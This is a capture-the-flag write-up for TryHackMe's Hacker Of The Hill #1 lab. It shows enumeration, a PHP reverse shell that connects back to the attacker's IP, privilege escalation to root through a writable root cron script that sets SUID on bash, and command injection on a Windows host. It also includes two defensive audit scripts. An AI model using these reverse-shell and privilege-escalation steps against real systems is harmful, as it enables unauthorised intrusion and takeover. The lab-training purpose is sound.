Hacker Of The Hill #1
A HackerOne event. Hack machines and submit flags to get private invitations to bug-bounty programs on HackerOne.
LINK
@official link of the room.
IMP *** NOTE ***
The IP of the victim / THM machine can differ throughout this blog, as I terminated and deployed the machine many times.
TASK 1 - INTRODUCTION
Q1) Make an account on HackerOne's CTF platform. [ No Answer Needed ]
Q2) Where else do you need to submit flags in order to win prizes and private bug-bounty invites? [ https://***.hacker101.com/ ]
TASK 2 - TUTORIALS & RULES
Q1) & Q2) [ No Answer Needed ]
EASY :- basic_start
{1} NMAP :-
nmap -sVC -v 10.10.228.122
>>> nmap -sVC -v 10.10.228.122
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
264/tcp filtered bgmp
8000/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8001/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8002/tcp open http Apache httpd 2.4.29 ((Ubuntu))
9999/tcp open abyss?
{2} GOBUSTER - ( PORT 80 )
gobuster dir -x php,txt -w /usr/share/dirb/wordlists/common.txt -t20 -u 10.10.228.122
>>> gobuster dir -x php,txt -w /usr/share/dirb/wordlists/common.txt -t20 -u 10.10.228.122
## only interesting result shown below
/index.html (Status: 200)
/server-status (Status: 403)
Through Nmap, we found that four different websites are running on the victim machine.
Serial Number | PORT number
1             | 80
2             | 8000
3             | 8001
4             | 8002
On port 80 only the default Linux Apache2 page is served and nothing useful was found, so let's move on to the second website, running on port 8000.
EASY :- port 8000
{1} GOBUSTER
gobuster dir -x php,txt -w /usr/share/dirb/wordlists/common.txt -t20 -u http://10.10.228.122:8000/
>>> gobuster dir -x php,txt -w /usr/share/dirb/wordlists/common.txt -t20 -u http://10.10.228.122:8000/
/about (Status: 200)
/contact (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
Ah! We found some accessible documents, let's read them :-
# Contents of robots.txt #
User-agent: *
Disallow: /vbcms
Oh! We found a directory named "vbcms" on that website. Let's check it out. It redirects us to a login page, "/vbcms/login". Let's start working on it; first, let's try some basic credentials for the login.
admin:password -> no luck
admin:12345 -> no luck
etc..
# got the access with these:-
ad***:a***n

Since we are admin, we can change the code of any page easily. Let's edit the "Home Page" and turn it into a reverse-shell page by replacing the current Home Page code with php-reverse-shell.php (by pentestmonkey).
# Location of reverse_shell on kali
/usr/share/webshells/php/php-reverse-shell.php
Note :- Change the IP address and port number in the php-reverse-shell code before using it. Better still, replace the two lines that set the ip and port variables with :-
$ip = isset($_POST['ip']) ? $_POST['ip'] : '10.17.7.71';
$port = isset($_POST['port']) ? $_POST['port'] : '4444';

# after changing the code of home page
>>> nc -nlvp <port_number>
# use the same port number that is in the php-reverse-shell code

>>> nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.17.7.71] from (UNKNOWN) [10.10.251.117] 59144
Linux web-serv 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
11:02:45 up 9 min, 0 users, load average: 0.00, 0.56, 0.56
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(serv1) gid=1000(serv1) groups=1000(serv1),43(utmp)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(serv1) gid=1000(serv1) groups=1000(serv1),43(utmp)
$ pwd
/
$ cd /home
$ ls -la
total 24
drwxr-xr-x 6 root root 4096 Feb 15 02:02 .
drwxr-xr-x 23 root root 4096 Feb 15 01:01 ..
drwxr-xr-x 2 serv1 serv1 4096 Feb 15 02:02 serv1
drwxr-xr-x 2 serv2 serv2 4096 Feb 15 02:02 serv2
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 02:02 serv3
drwxr-xr-x 2 serv4 serv4 4096 Feb 15 19:20 serv4
Since we are 'serv1', we have full access to serv1's home folder. Let's check what's in it.
$ cd serv1
$ ls -la
total 20
drwxr-xr-x 2 serv1 serv1 4096 Feb 15 02:02 .
drwxr-xr-x 6 root root 4096 Feb 15 02:02 ..
lrwxrwxrwx 1 root root 9 Feb 15 00:56 .bash_history -> /dev/null
-rw-r--r-- 1 serv1 serv1 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 serv1 serv1 3771 Apr 4 2018 .bashrc
-rw-r--r-- 1 serv1 serv1 807 Apr 4 2018 .profile
Nothing important found. Through the HINT button of the serv1 flag on TryHackMe, we get the flag location "/usr/games/fortune".
$ cd /usr/games
$ cat fortune
VEh*******ROems****JM01ER****FV6TldZd05qTXlaa*******
Let's find a way to get either a root shell or root privileges. Let's browse the other users' home directories too.
# after a while we find an interesting file in the serv3 folder
$ pwd
/home/serv3/backups
$ ls -la
total 16
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 01:02 .
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 02:02 ..
-r-xr-xr-x 1 serv3 serv3 52 Feb 15 01:02 backup.sh
drwxr-xr-x 2 serv3 serv3 4096 Feb 15 01:01 files
# let's also check what's in the crontab file :-
$ cat /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /home/serv3/backups/backup.sh
## Wow, backup.sh is in crontab and runs as root
## if we get write permission on backup.sh
## then we can get a root shell easily.
## but the owner is serv3, so first we have to get a serv3 shell
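As an added defensive check, not part of the original writeup: a small POSIX sh function that reads a system crontab in the /etc/crontab layout shown above and reports root jobs whose script a non-root user could rewrite (non-root owner, group/world-writable, or missing). The file paths used when testing it are constructed, not the machine's.

```shell
#!/bin/sh
# Added defensive check: audit a system crontab (/etc/crontab layout:
# m h dom mon dow user command) for jobs that run as root but execute a
# script that a non-root user could rewrite. One line per finding:
#   "nonroot-owner:<user> <path>" | "writable <path>" | "missing <path>"
audit_root_cron() {
    crontab_file="$1"
    # Drop comments, blank lines and VAR=value settings such as SHELL= and PATH=.
    grep -Ev '^[[:space:]]*(#|$)|^[A-Za-z_]+=' "$crontab_file" |
    while read -r _min _hour _dom _mon _dow user cmd _rest; do
        [ "$user" = "root" ] || continue          # only root jobs matter here
        case "$cmd" in
            /*) ;;                                # inspect absolute-path commands
            *)  continue ;;                       # 'cd / && run-parts ...' is skipped
        esac
        if [ ! -e "$cmd" ]; then
            echo "missing $cmd"                   # root will run whatever appears there
            continue
        fi
        owner=$(ls -ld "$cmd" | awk '{print $3}') # third ls -l column is the owner
        if [ "$owner" != "root" ]; then
            # The owner can chmod the file at will, as serv3 can with backup.sh.
            echo "nonroot-owner:$owner $cmd"
        elif [ -n "$(find "$cmd" -prune \( -perm -020 -o -perm -002 \) -print)" ]; then
            echo "writable $cmd"                  # group- or world-writable
        fi
    done
}
```

Run it as `audit_root_cron /etc/crontab`; an empty result means every root job points at a root-owned, non-writable command (cron.d fragments use the same layout and can be passed the same way).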
So let's get a serv3 shell. We know that serv1's website runs on port 8000, so the website on port 8002 might belong to serv3. Let's exploit the website on port 8002 first.
EASY :- port 8002

We have a 'try free lesson' button on the site, let's try that first. Oh! There's a textarea where we can write any PHP code, and the result is reflected in our browser too.

OK, let's try pasting the php-reverse-shell code (the same one we used to get the serv1 shell).

NOTE :- ' Don't paste <?php & ?> in the textarea, as they are already there '
Let's start netcat on our Kali machine on the port written in the reverse-shell code, and then click the "check" button.

# first let's get the serv3 flag, then we will try to get root privileges.
# the flag is located at "/var/www/serv4/index.php"
$ pwd
/var/www/serv4
$ cat index.php
THM{****ODZj*****DEwM2F******2RiYz**}
# with this we get a shell as the same user, but upgraded to a PTY without the environment restrictions
$ python3 -c 'import pty;pty.spawn("/bin/sh")'
$ cd /home/serv3
$ ls -laR
total 24
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 02:02 .
drwxr-xr-x 6 root root 4096 Feb 15 02:02 ..
lrwxrwxrwx 1 root root 9 Feb 15 00:56 .bash_history -> /dev/null
-rw-r--r-- 1 serv3 serv3 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 serv3 serv3 3771 Apr 4 2018 .bashrc
-rw-r--r-- 1 serv3 serv3 807 Apr 4 2018 .profile
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 01:02 backups
./backups:
total 16
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 01:02 .
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 02:02 ..
-r-xr-xr-x 1 serv3 serv3 52 Feb 15 01:02 backup.sh
drwxr-xr-x 2 serv3 serv3 4096 Feb 15 01:01 files
./backups/files:
total 8
drwxr-xr-x 2 serv3 serv3 4096 Feb 15 01:01 .
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 01:02 ..
# we already know that backup.sh is present in crontab
# and that crontab runs backup.sh as root.
# and now we are the owner of the backup.sh file, which means we can get a root shell.
# but first let's get the serv3 flag in "/var/www/serv4/"
$ cat /var/www/serv4/index.php
cat /var/www/serv4/index.php
THM{YmN****jN2******M2F***A5Y2*****h}
# to get the real flag , submit the flag at :- "https://ctf.hacker101.com/ctf/flagcheck"
:-) Getting Root Privilege
# let's check its (/home/serv3/backups/backup.sh) content first
$ cat backup.sh
#!/bin/bash
mv /backups/* /home/serv3/backups/files
# let's change the content of backup.sh
# but before that we have to change the current permissions of backup.sh in order to write to it.
$ chmod 777 backup.sh
# then, write our 'malicious payload' to get root privileges.
# we are setting the SUID bit on '/bin/bash' so that we can run '/bin/bash' as the root user
# and we are also copying /bin/bash to the current directory
$ echo "#!/bin/bash
chmod 4777 /bin/bash
cp /bin/bash /home/serv3/backups/bash" > backup.sh
$ cat backup.sh
#!/bin/bash
chmod 4777 /bin/bash
cp /bin/bash /home/serv3/backups/bash
$ ls
backup.sh
files
# lets wait a minute to run cron job
# lets check
$ ls -la
total 1104
drwxr-xr-x 3 serv3 serv3 4096 Jul 26 08:09 .
drwxr-xr-x 3 serv3 serv3 4096 Feb 15 02:02 ..
-rwxrwxrwx 1 serv3 serv3 71 Jul 26 08:08 backup.sh
-rwxr-xr-x 1 root root 1113504 Jul 26 08:11 bash
drwxr-xr-x 2 serv3 serv3 4096 Feb 15 01:01 files
# wow, we got the bash file here (root-owned), let's run it and get root privileges
$ bash -p
id
uid=1002(serv3) gid=1002(serv3) euid=0(root) groups=1002(serv3)
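As an added detection example (not the writeup's own code): a sh function that walks a directory tree for setuid executables and flags the two artefacts the escalation above leaves behind, a setuid binary outside the system binary directories and a setuid copy of a shell. The directory it is tested against is constructed.

```shell
#!/bin/sh
# Added detection example: walk a directory tree for setuid executables and
# report the ones that look like the artefacts left by the privilege
# escalation above: a setuid binary outside the system binary directories,
# or a setuid shell (which 'bash -p' turns into a root shell). One line per hit.
find_rogue_suid() {
    root_dir="$1"
    # -perm -4000 selects files with the setuid bit; errors for unreadable
    # directories are discarded so the scan can run as an ordinary user.
    find "$root_dir" -type f -perm -4000 2>/dev/null | while read -r f; do
        case "$f" in
            /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*|/usr/lib/*|/usr/libexec/*)
                # Expected location: still flag it if it is a shell, as with
                # the chmod 4777 /bin/bash performed by the cron payload.
                case "${f##*/}" in
                    sh|bash|dash|zsh|ksh) echo "setuid-shell $f" ;;
                esac ;;
            *)
                # /home/serv3/backups/bash style: setuid outside system dirs.
                echo "outside-system-dirs $f" ;;
        esac
    done
}
```

A scan of the whole host is `find_rogue_suid /`; compare the result against a baseline taken from a clean build so that legitimate setuid helpers are not reported every run.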
# lets read all remaining flags
# serv2 (/var/lib/rary)
$ cat rary
THM{B**_Y****e_G**d_T***_**_***_*_H**h}
# root (/root/root.txt)
$ cat root.txt
THM{OW***GR**WM0******NmM2****NkODg*}
Paste these flags at "https://ctf.hacker101.com/ctf/flagcheck" to get the real flag 'BACK2THM'
MEDIUM :- basic_start
{1} NMAP :-
nmap -sVC -v -Pn 10.10.236.132
$ nmap -sVC -v -Pn 10.10.236.132
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
82/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-16 04:03:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: troy.thm0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: troy.thm0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server?
MEDIUM :- port 80
{1} GOBUSTER :-
gobuster dir -x php,txt -w /usr/share/dirb/wordlists/common.txt -t10 -u http://10.10.236.132:80/
$ gobuster dir -x php,txt -w /usr/share/dirb/wordlists/common.txt -t10 -u http://10.10.236.132:80/
/dashboard (Status: 302)
/login (Status: 200)
/logout (Status: 302)
/profile (Status: 302)
/signup (Status: 200)
/users (Status: 301)

Let's create an account here ( "test:test" ) :-

We get a dashboard page where we can upload images. Let's try to upload a PHP file and see what happens. Error :- "File must end in .jpg". Nope, after several tries nothing can be done here, so let's look for something else to exploit.

I found an interesting JS file (after some playing around), "Inspect Element -> Network Tab -> script.js", which is responsible for sanitizing the username field input. So let's first block it (the script.js file),

then we can try to exploit the username field on the "/profile" webpage. I am trying to test command injection here :-
NOTE :- I am trying command injection on the 'change username' input field, which is on -> 'http://<thm-machine-ipaddr>/profile'
So I will try to ping my Kali machine from the victim machine and check (on my Kali) whether the ping command runs successfully or not (i.e. whether command injection is working or not).
{ON KALI}
sudo tcpdump -i tun0 icmp
$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
{ ON WEBSITE }

After clicking "change username" button.
{ ON KALI }

Yay! We received the ping request, which means command injection works. Now let's insert a PowerShell reverse-shell payload to get a reverse shell.
NOTE -> "PowerShell reverse shell because, through Nmap, we came to know it is a Windows machine; I pasted a line below from the Nmap output that makes it clear that it is a Windows machine"
END